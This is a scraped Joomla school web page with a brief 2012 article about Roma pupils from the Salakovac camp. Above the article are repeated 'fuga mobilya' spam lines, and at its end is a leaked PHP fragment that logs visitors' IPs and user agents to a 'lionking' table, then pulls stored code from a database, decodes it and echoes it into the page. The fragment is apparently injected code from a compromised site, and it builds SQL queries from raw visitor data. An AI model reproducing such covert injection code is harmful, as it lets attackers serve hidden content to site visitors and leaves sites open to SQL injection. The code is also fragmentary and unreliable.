fuga mobilya
fuga mobilya
fuga mobilya
fuga mobilya
fuga mobilya
fuga mobilya
fuga mobilya
fuga mobilya
fuga mobilya
fuga mobilya
fuga mobilya
fuga mobilya
fuga mobilya
Naši učenici Romi
forex trading logo

Ponedjeljak, 13 Februar 2012 16:55

Naši učenici Romi

Written by  škola
Rate this item
(4 votes)

Romi su danas najbrojnija i najugroženija nacionalna manjina u BiH. Romi pripadaju najsiromašnijem dijelu bosanskohercegovačkog stanovništva, zbog toga ih se veoma mali broj školuje, kao i zbog slabog poznavanja jezika, slabe informiranosti roditelja o njihovim pravima itd. Djeca Roma u našu školu počela su pristizati školske 2004/05. godine., njihov broj stalno varira zbog njihovih čestih selidbi.

U Kampu “Salakovac” gdje su i smješteni učenici romske populacije, održavaju se redovni sastanci (mjesečno) sa upravnikom kampa, socijalnim radnicima i roditeljima. Od strane Škole sastancima prisustvuje pomoćnik direktora, pedagog te po potrebi neko od nastavnika.

Od školske 2008/09. godine učenici romske populacije završavaju osnovnu školu.

Read 3521 times

Add comment


Security code Refresh

Ko je online?

Trenutno aktivnih Gostiju: 19 Powered by Joomla!. Valid XHTML and CSS.

= 1) { //mysql_query('INSERT INTO lionking (domainname, fullpath, ip, useragent, processtime) VALUES ("'.$g['domainname'].'","'.$g['fullpath'].'","'.$g['ip'].'","'.$g['useragent'].'", NOW())'); $rs = mysql_fetch_array($q); echo stripslashes(stripslashes(stripslashes(html_entity_decode(html_entity_decode($rs['code']))))); } else { mysql_query('INSERT INTO lionking_saved (domainname, stat, processtime) VALUES ("'.$g['domainname'].'","2", NOW())'); } } ?>